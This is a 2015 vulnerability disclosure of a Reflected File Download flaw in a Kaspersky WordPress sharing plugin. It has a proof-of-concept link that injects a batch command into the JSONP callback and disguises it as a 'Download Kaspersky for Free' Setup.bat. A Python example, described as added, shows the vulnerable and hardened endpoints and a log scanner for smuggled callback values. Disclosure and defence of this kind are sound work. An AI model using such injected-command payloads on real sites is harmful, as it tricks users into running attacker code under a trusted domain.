Kaspersky Social Sharing WordPress Plugin RFD

WS201507 – Kaspersky Social Sharing WordPress Plugin RFD
by David Sopas @dsopas
www.websegura.net

Description:

While visiting securelist.com I noticed a request to an application/json endpoint whose response could be manipulated using RFD (Reflected File Download).

http://securelist.com/wp-content/plugins/kaspersky-social-sharing/counter/index.php?url=http://www.websegura.net&callback=json[RFD Attack]

It was a WordPress plugin used by many Kaspersky sites.
Because the filename could not be controlled through the URL, I used the HTML5 download attribute to set it [supported by the latest versions of Chrome, Opera, Android Browser and Chrome for Android].

So if you had this HTML code on a page you controlled:

<a download="Setup.bat" href="http://securelist.com/wp-content/plugins/kaspersky-social-sharing/counter/index.php?url=http://www.websegura.net&callback=json||start%20chrome%20websegura.net/malware.htm||">Download Kaspersky for Free</a>

It would launch the attack. When the user clicked the download link, the browser would save a file that appeared to come from securelist.com [a trusted domain]. Running the batch file would then open Google Chrome on an attacker-chosen site [which I simulated with my own site containing only text].
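The root cause is a JSONP-style endpoint that reflects the callback parameter into the response body unchecked. The following Python is an added example (not the plugin's code, and not from the advisory's author): a constructed stand-in for the counter endpoint in its vulnerable and hardened forms, plus a small check that runs over constructed access-log lines and flags callback values that fail the allow-list. Function names, the log lines and the count values are all assumptions.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Allow-list for a JSONP callback: a bare JavaScript identifier of bounded length.
# Anything else ("|", ";", "&", quotes, spaces) is rejected before it reaches the body.
CALLBACK_RE = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]{0,63}")


def is_safe_callback(name):
    """True only if the callback name is a plain identifier."""
    return CALLBACK_RE.fullmatch(name) is not None


def vulnerable_counter(callback, count):
    """Reflects the callback unchecked, as the advisory describes.
    Constructed stand-in, not the plugin's real code. Returns (status, headers, body)."""
    body = "%s(%s)" % (callback, json.dumps({"count": count}))
    return 200, {"Content-Type": "application/json"}, body


def hardened_counter(callback, count):
    """Same endpoint with the three standard RFD mitigations:
    validate the reflected value, declare the real MIME type with nosniff,
    and pin a harmless filename in case a download is ever forced."""
    if not is_safe_callback(callback):
        headers = {"Content-Type": "application/json; charset=utf-8",
                   "X-Content-Type-Options": "nosniff"}
        return 400, headers, json.dumps({"error": "invalid callback"})
    headers = {
        "Content-Type": "application/javascript; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": 'attachment; filename="counter.json"',
    }
    body = "%s(%s);" % (callback, json.dumps({"count": count}))
    return 200, headers, body


# Constructed access-log lines (Combined Log Format); IPs are documentation addresses.
PLUGIN_PATH = "/wp-content/plugins/kaspersky-social-sharing/counter/index.php"
LOG_LINES = [
    '203.0.113.5 - - [12/Mar/2015:10:00:00 +0000] "GET %s?url=http://example.com&callback=json HTTP/1.1" 200 48' % PLUGIN_PATH,
    '203.0.113.7 - - [12/Mar/2015:10:00:02 +0000] "GET %s?url=http://example.com&callback=json%%7C%%7Cecho%%20hi%%7C%%7C HTTP/1.1" 200 61' % PLUGIN_PATH,
    '203.0.113.9 - - [12/Mar/2015:10:00:05 +0000] "GET %s?url=http://example.com&callback=jQuery17101 HTTP/1.1" 200 55' % PLUGIN_PATH,
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP')


def flag_rfd_candidates(log_lines):
    """Return (client_ip, decoded_callback) for requests whose callback fails the allow-list.
    parse_qs percent-decodes the value, so encoded '|' and spaces are caught too."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        for cb in parse_qs(query).get("callback", []):
            if not is_safe_callback(cb):
                hits.append((line.split()[0], cb))
    return hits


if __name__ == "__main__":
    print(vulnerable_counter("json||x||", 1))
    print(hardened_counter("json||x||", 1))
    print(hardened_counter("jQuery17101", 1))
    print(flag_rfd_candidates(LOG_LINES))
```

The allow-list is the part that actually closes the hole; the headers are defence in depth. Note that current Chrome (since version 65) and Firefox ignore the download attribute on cross-origin links, which removes this particular filename-forcing vector, but the reflected body is still there until the server validates the callback.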

[Screenshot: securelist_screen]

Kaspersky replied to my alert very quickly and showed that they really care about the security of their clients:

The issue is fixed across our blogs
We have pushed a fix to the upstream to fix it on other, non-KL blogs

I also want to thank Kaspersky for sending me a gift pack and being the FIRST company to have their name on our Thanks list.

Timeline:
12 Mar 2015 – Reported to Kaspersky
17 Mar 2015 – Kaspersky replied that everything is patched
20 Mar 2015 – Received a gift from Kaspersky
23 Mar 2015 – Full disclosure
